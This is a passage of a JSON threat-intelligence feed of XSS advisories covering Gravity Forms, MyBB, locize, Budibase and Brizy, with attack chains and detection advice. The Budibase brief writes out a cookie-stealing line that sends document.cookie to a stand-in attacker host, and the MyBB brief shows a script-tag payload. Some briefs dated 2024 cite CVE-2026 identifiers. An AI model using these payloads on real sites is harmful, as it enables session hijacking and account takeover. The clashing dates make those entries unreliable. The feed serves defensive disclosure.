repeater\u0026rsquo;s \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method renders the unsanitized output, leading to the execution of the injected XSS payload within the administrator\u0026rsquo;s browser.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript code within the context of an authenticated WordPress administrator\u0026rsquo;s session. This can lead to account takeover, data theft, or further malicious actions performed on the WordPress site. While the number of potentially affected sites is large due to the plugin\u0026rsquo;s popularity, the impact is limited to administrators who access the specific entry containing the malicious payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to a version greater than 2.10.0 to patch CVE-2026-5112.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u003ccode\u003eDetect Gravity Forms XSS via Product Name\u003c/code\u003e to detect attempts to inject malicious scripts into product names.\u003c/li\u003e\n\u003cli\u003eReview and audit existing Gravity Forms entries for suspicious content in Calculation Product fields to identify potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-gravityforms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.10.0, allowing unauthenticated attackers to inject arbitrary web scripts via form submissions that execute when an administrator views the entry detail page.","title":"Gravity Forms Plugin Unauthenticated Stored XSS 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-gravityforms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2018-25309"}],"_cs_exploited":false,"_cs_products":["Recent threads 17.0"],"_cs_severities":["medium"],"_cs_tags":["xss","cve-2018-25309","web-application"],"_cs_type":"advisory","_cs_vendors":["MyBB"],"content_html":"\u003cp\u003eMyBB Recent Threads 17.0 is vulnerable to a persistent cross-site scripting (XSS) vulnerability, identified as CVE-2018-25309. This vulnerability allows attackers to inject malicious JavaScript code into the subject lines of forum threads. When other users view the index page or any page displaying the affected thread titles, the injected script executes within their browsers. This can lead to session hijacking, defacement, or other malicious actions. The vulnerability was reported in 2018 but remains relevant for older MyBB installations that have not been patched or upgraded. The attacker exploits a lack of proper input sanitization in the thread creation process.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious thread subject containing JavaScript code (e.g., \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker submits the crafted thread subject when creating a new thread on the MyBB forum.\u003c/li\u003e\n\u003cli\u003eThe MyBB application stores the malicious subject in the database without proper sanitization.\u003c/li\u003e\n\u003cli\u003eA user visits the forum\u0026rsquo;s index page or any page that displays the thread\u0026rsquo;s subject.\u003c/li\u003e\n\u003cli\u003eThe MyBB application retrieves the thread subject from the database and injects it into the HTML of the page.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser parses the HTML and executes the injected JavaScript 
code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code performs malicious actions, such as stealing cookies or redirecting the user to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to various impacts, including session hijacking, where an attacker steals a user\u0026rsquo;s session cookie and gains unauthorized access to their account. Website defacement is also possible, where the attacker alters the appearance of the forum. In a targeted attack, the attacker could potentially gain control over the MyBB server itself, depending on the permissions of the user whose session is hijacked and the server configuration. Given the popularity of MyBB, a successful exploit could affect numerous forums and their users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect MyBB XSS via Thread Title\u003c/code\u003e to identify potential exploitation attempts by detecting script tags in HTTP request parameters to thread creation endpoints.\u003c/li\u003e\n\u003cli\u003eInspect web server logs for HTTP requests containing \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags in the \u003ccode\u003esubject\u003c/code\u003e parameter when creating a new thread, as this is indicative of a potential XSS attack (see references for vulnerable parameter).\u003c/li\u003e\n\u003cli\u003eUpgrade MyBB installations to a patched version that includes proper input sanitization to prevent XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-mybb-xss/","summary":"MyBB Recent threads 17.0 contains a persistent cross-site scripting vulnerability (CVE-2018-25309) that allows attackers to inject malicious scripts by creating threads 
with crafted subject lines, leading to arbitrary JavaScript execution in the browsers of users viewing the index page.","title":"MyBB Recent Threads 17.0 Persistent Cross-Site Scripting Vulnerability (CVE-2018-25309)","url":"https://feed.craftedsignal.io/briefs/2024-01-mybb-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["locize client SDK"],"_cs_severities":["high"],"_cs_tags":["xss","dom-xss","postMessage","locize","javascript"],"_cs_type":"advisory","_cs_vendors":["locize"],"content_html":"\u003cp\u003eThe locize client SDK, a browser module integrating the locize InContext translation editor, contains a cross-origin vulnerability in versions prior to 4.0.21. The vulnerability stems from the SDK\u0026rsquo;s failure to validate the \u003ccode\u003eevent.origin\u003c/code\u003e property when handling \u003ccode\u003ewindow.addEventListener(\u0026quot;message\u0026quot;)\u003c/code\u003e events. This allows a malicious webpage sharing a window reference with a locize-enabled host (e.g., via an iframe) to send crafted \u003ccode\u003epostMessage\u003c/code\u003e calls, triggering internal handlers without proper authorization. Successful exploitation can lead to DOM-based XSS, hijacking of the \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e properties, and CSS injection, potentially compromising the confidentiality and integrity of the application. 
This vulnerability was discovered via an internal security audit of the locize ecosystem.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker hosts a malicious webpage with the intent to exploit a locize-enabled application.\u003c/li\u003e\n\u003cli\u003eThe locize-enabled application embeds the attacker\u0026rsquo;s page as an iframe or has a \u003ccode\u003ewindow.opener\u003c/code\u003e/\u003ccode\u003ewindow.open\u003c/code\u003e relationship with it.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a \u003ccode\u003epostMessage\u003c/code\u003e with a \u003ccode\u003esender\u003c/code\u003e field equal to \u003ccode\u003e\u0026quot;i18next-editor-frame\u0026quot;\u003c/code\u003e and a malicious payload targeted at specific handlers.\u003c/li\u003e\n\u003cli\u003eThe locize SDK\u0026rsquo;s \u003ccode\u003ewindow.addEventListener(\u0026quot;message\u0026quot;)\u003c/code\u003e handler receives the message and, without validating \u003ccode\u003eevent.origin\u003c/code\u003e, dispatches it to the internal handlers.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003eeditKey\u003c/code\u003e or \u003ccode\u003ecommitKeys\u003c/code\u003e handlers, the attacker-controlled payload values are assigned to \u003ccode\u003eitem.node.innerHTML\u003c/code\u003e or \u003ccode\u003eitem.node.setAttribute(attr, value)\u003c/code\u003e, injecting malicious scripts or HTML.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003eisLocizeEnabled\u003c/code\u003e handler, the \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e are hijacked, redirecting subsequent messages to the attacker\u0026rsquo;s window and exfiltrating translation content.\u003c/li\u003e\n\u003cli\u003eIf the attacker targets the \u003ccode\u003erequestPopupChanges\u003c/code\u003e handler, malicious CSS code is injected into the popup\u0026rsquo;s inline 
style.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive data or injects malicious content into the locize-enabled application, impacting its integrity and confidentiality.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to several critical consequences. Cross-origin DOM XSS allows arbitrary code execution within the context of the vulnerable application. Hijacking \u003ccode\u003eapi.source\u003c/code\u003e and \u003ccode\u003eapi.origin\u003c/code\u003e results in the leakage of translation content and metadata to the attacker, compromising sensitive information. CSS injection can alter the visual appearance of the application, potentially leading to phishing attacks or further exploitation. The number of victims depends on the adoption rate of vulnerable locize SDK versions prior to 4.0.21.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to \u003ccode\u003elocize\u003c/code\u003e client SDK version 4.0.21 or later to patch the vulnerability. 
This version implements \u003ccode\u003eevent.origin\u003c/code\u003e validation in \u003ccode\u003esrc/api/postMessage.js\u003c/code\u003e, mitigating the risk of cross-origin attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Locize Client SDK DOM XSS Attempt via postMessage\u0026rdquo; to identify exploitation attempts based on manipulation of \u003ccode\u003einnerHTML\u003c/code\u003e or \u003ccode\u003esetAttribute\u003c/code\u003e in the locize context.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and monitor for suspicious \u003ccode\u003epostMessage\u003c/code\u003e events originating from unexpected domains to detect potential exploitation attempts targeting the locize SDK.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-locize-xss/","summary":"The locize client SDK versions prior to 4.0.21 are vulnerable to cross-origin DOM XSS and handler hijack due to missing origin validation in the InContext Editor, allowing attackers to inject malicious code and exfiltrate data via crafted postMessage events.","title":"locize Client SDK Cross-Origin DOM XSS and Handler Hijack Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-02-locize-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. 
This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to access the cookie\u0026rsquo;s contents.  An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account.  Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, exacerbating the risk. This vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eAttacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload designed to read the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie using \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe malicious script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example, by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT to authenticate to the Budibase application, bypassing normal login procedures.\u003c/li\u003e\n\u003cli\u003eThe attacker 
gains persistent access to the victim\u0026rsquo;s account and can perform actions as the victim, including accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie transforms every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to potential data breaches, unauthorized application modifications, and further propagation of malicious content. This impacts all Budibase deployments running vulnerable versions, potentially affecting a wide range of organizations using the platform for their internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect potential JWT theft attempts via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can now lead to full account takeover.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT 
Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5324"}],"_cs_exploited":false,"_cs_products":["Brizy – Page Builder plugin \u003c= 2.8.11"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","unauthenticated"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Brizy – Page Builder plugin for WordPress, a popular tool for designing website pages, contains a critical vulnerability that allows unauthenticated users to inject malicious JavaScript code. Specifically, versions up to and including 2.8.11 are affected. This vulnerability arises from a combination of factors, including the lack of nonce verification for form submissions from non-logged-in users, inadequate handling of FileUpload fields when no file is actually uploaded, and the unintended reversal of security encoding through \u003ccode\u003ehtml_entity_decode()\u003c/code\u003e before outputting data. 
This allows attackers to inject arbitrary web scripts that execute in the context of a logged-in administrator viewing the form\u0026rsquo;s \u0026ldquo;Leads\u0026rdquo; page, potentially leading to account takeover, data theft, or further compromise of the WordPress site.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker submits this payload through a Brizy form on the WordPress site, exploiting the missing nonce verification in the \u003ccode\u003esubmit_form()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehandleFileTypeFields()\u003c/code\u003e function fails to properly sanitize or overwrite the attacker-supplied values when no file is attached to the form submission.\u003c/li\u003e\n\u003cli\u003eThe injected payload, now stored in the WordPress database, bypasses initial \u003ccode\u003ehtmlentities()\u003c/code\u003e encoding due to later \u003ccode\u003ehtml_entity_decode()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAn administrator logs into the WordPress dashboard and navigates to the \u0026ldquo;Leads\u0026rdquo; page to view form submissions.\u003c/li\u003e\n\u003cli\u003eThe form-data.php template retrieves the stored malicious payload from the database.\u003c/li\u003e\n\u003cli\u003eThe payload is outputted directly within the \u003ccode\u003ehref\u003c/code\u003e attribute of an HTML element without proper escaping using \u003ccode\u003eesc_url()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the administrator\u0026rsquo;s browser, potentially performing actions such as stealing cookies or redirecting the administrator to a malicious site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows 
an unauthenticated attacker to execute arbitrary JavaScript code in the context of a logged-in administrator\u0026rsquo;s browser. This could lead to a full compromise of the WordPress site, including the ability to create new administrative accounts, modify existing content, inject malware into the site\u0026rsquo;s pages, or steal sensitive data. The impact is significant, as it requires no user interaction beyond an administrator viewing the form submissions within the Brizy plugin.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Brizy – Page Builder plugin to the latest version to patch CVE-2026-5324.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Brizy WordPress Plugin XSS Attempt via HTTP Request\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eReview the \u003ccode\u003eform-data.php\u003c/code\u003e template and implement proper output escaping using \u003ccode\u003eesc_url()\u003c/code\u003e for all user-supplied data to prevent XSS, as mentioned in the vulnerability description.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-brizy-xss/","summary":"The Brizy – Page Builder plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.8.11, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the form Leads page due to missing nonce verification and improper handling of file upload fields.","title":"Brizy WordPress Plugin Unauthenticated Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-brizy-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Xss","version":"https://jsonfeed.org/version/1.1"}